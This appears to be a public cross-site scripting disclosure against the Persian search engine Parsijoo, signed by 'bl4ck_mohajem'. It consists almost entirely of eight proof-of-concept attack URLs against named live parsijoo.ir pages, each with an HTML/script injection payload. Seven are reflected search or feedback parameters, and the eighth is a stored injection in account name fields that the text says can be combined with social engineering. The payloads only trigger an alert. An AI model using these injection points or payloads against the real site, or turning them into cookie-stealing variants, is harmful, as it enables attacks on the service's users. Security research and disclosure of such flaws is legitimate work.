================================================================================
Cross Site Scripting on Search Engine Parsijoo
================================================================================
# # Author: bl4ck_mohajem  (mohajem.war@gmail.com)

# #home page : http://www.parsijoo.ir/



# Description:
Parsijoo as a Persian search engine attempts to search for Persian
resources within the network.

# PoC 1 :
# URL: http://parsijoo.ir/web
# Vulnerable Parameter : q
# Payload : "><img src=x onerror='alert("Found By bl4ck_mohajem  ")'>
# ==> http://parsijoo.ir/web?q="><img src=x onerror='alert("Found By
bl4ck_mohajem  ")'>


# PoC 2 :
# URL: http://image.parsijoo.ir/image
# Vulnerable Parameter : q
# Payload : "><img src=x onerror='alert("Found By bl4ck_mohajem  ")'>
# ==> http://image.parsijoo.ir/image?q="><img src=x
onerror='alert("Found By bl4ck_mohajem  ")'>


# PoC 3 :
# URL: http://video.parsijoo.ir/video
# Vulnerable Parameter : q
# Payload : "><img src=x onerror='alert("Found By bl4ck_mohajem  ")'>
# ==> http://video.parsijoo.ir/video?q="><img src=x
onerror='alert("Found By bl4ck_mohajem  ")'>


# PoC 4 :
# URL: http://ava.parsijoo.ir/ava
# Vulnerable Parameter : q
# Payload : "><img src=x onerror='alert("Found By bl4ck_mohajem  ")'>
# ==> http://ava.parsijoo.ir/ava?q="><img src=x onerror='alert("Found
By bl4ck_mohajem  ")'>


# PoC 5 :
# URL: http://parsijoo.ir/download
# Vulnerable Parameter : q
# Payload : "><img src=x onerror='alert("Found By bl4ck_mohajem  ")'>
# ==> http://parsijoo.ir/download?q="><img src=x onerror='alert("Found
By bl4ck_mohajem  ")'>


# PoC 6 :
# URL: http://parsijoo.ir/bazaar
# Vulnerable Parameter : q
# Payload : "><img src=x onerror='alert("Found By bl4ck_mohajem  ")'>
# ==> http://parsijoo.ir/bazaar?q=><img src=x onerror='alert("Found By
bl4ck_mohajem  ")'>


# PoC 7 :
# URL: http://parsijoo.ir/feedback
# Vulnerable Parameter : src
# Payload : "><img src=x onerror='alert("Found By bl4ck_mohajem  ")'>
# ==> http://parsijoo.ir/feedback?src="><img src=x
onerror='alert("Found By bl4ck_mohajem  ")'>


# PoC 8 :
A registered user can exploit this issue in combination with social engineering.
# URL : https://accounts.parsijoo.ir/account
# Vulnerable Parameter (POST) : form:name , form:lastname
# Payload : "><script>alert('Found By bl4ck_mohajem  ')</script>
Now can see alert in first page.


########################################################
#tnx: Milad Hacking - arf1372 - shabgard - ehsan hosseini - The
Nonexistent - n1arash-  B3HZ4D - AMo hassan
#
#######################################################